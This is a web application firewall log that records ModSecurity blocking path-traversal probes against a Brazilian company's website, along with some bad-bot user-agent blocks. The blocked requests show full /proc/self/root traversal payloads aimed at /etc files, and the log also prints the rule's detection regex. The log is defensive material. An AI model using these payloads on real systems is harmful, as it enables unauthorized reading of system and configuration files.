[Tue Mar 17 11:43:36.387107 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.241.46:56590] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablomK4xEDsg_V3ESNY_jAAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:43:55.463169 2026] [:error] [pid 2742:tid 140411582465792] [client 74.7.243.203:60656] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abloq6Wl1W69SFJ8FcxjMQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:47:11.227578 2026] [:error] [pid 9155:tid 140411708356352] [client 74.7.228.16:39560] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablpb9bI7zhHXcabyMUy7QAAAkQ"]
[Tue Mar 17 11:48:31.910941 2026] [:error] [pid 2438:tid 140411540502272] [client 74.7.243.203:50642] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablpvwAK_Njv7NSBJQL52QAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:51:39.718949 2026] [:error] [pid 2018:tid 140411565680384] [client 74.7.244.31:40560] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablqe8vohlba1G1UJvs9PQAAAFU"]
[Tue Mar 17 11:51:56.039150 2026] [:error] [pid 18380:tid 140411716749056] [client 74.7.241.46:52940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablqjK4xEDsg_V3ESNY_1wAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:52:40.658766 2026] [:error] [pid 7437:tid 140411540502272] [client 74.7.228.16:34510] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablquAeiSKl8TjouI-YO9wAAA9g"]
[Tue Mar 17 11:55:02.510360 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.243.203:36758] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablrRq4xEDsg_V3ESNY_4gAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:55:32.302258 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.243.203:38824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablrZKt8Nd0UC_OcbVG9fQAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:57:47.135754 2026] [:error] [pid 2160:tid 140411582465792] [client 74.7.228.16:34464] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablr6zjrdei6i7MVRTDQuAAAARM"]
[Tue Mar 17 11:59:45.480900 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.46:35604] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablsYRj0p0SRWAqcjGFuGQAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:00:57.175973 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.203:50846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablsqdY0UrI5A3LftIzwQAAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:01:01.257699 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.243.203:55590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablsrat8Nd0UC_OcbVG9vwAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:01:18.767171 2026] [:error] [pid 17965:tid 140411624429312] [client 74.7.243.203:49240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablsvqt8Nd0UC_OcbVG90QAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:01:21.751338 2026] [:error] [pid 9155:tid 140411649607424] [client 74.7.243.203:48522] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablswdbI7zhHXcabyMUzlAAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:01:31.288411 2026] [:error] [pid 9155:tid 140411649607424] [client 74.7.243.203:35872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablsy9bI7zhHXcabyMUzpwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:01:45.930614 2026] [:error] [pid 11293:tid 140411649607424] [client 74.7.243.203:54778] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abls2dCmCSWTlPouqorZeQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:01:48.388638 2026] [:error] [pid 2160:tid 140411741927168] [client 74.7.243.203:50920] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abls3Djrdei6i7MVRTDQ4wAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:01:49.663610 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.243.203:50928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abls3Rj0p0SRWAqcjGFuJQAAAxI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:02:02.710348 2026] [:error] [pid 2160:tid 140411574073088] [client 74.7.244.31:55772] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abls6jjrdei6i7MVRTDQ5gAAARQ"]
[Tue Mar 17 12:02:06.898948 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.243.203:40380] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abls7Rj0p0SRWAqcjGFuMwAAAwc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:02:09.464276 2026] [:error] [pid 2160:tid 140411590858496] [client 74.7.243.203:45000] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abls8Tjrdei6i7MVRTDQ6QAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:02:49.074598 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.243.203:54514] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltGat8Nd0UC_OcbVG-AQAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:02:51.543429 2026] [:error] [pid 9299:tid 140411741927168] [client 74.7.243.203:47944] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abltG7-sgTmmJoPuMdysBAAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
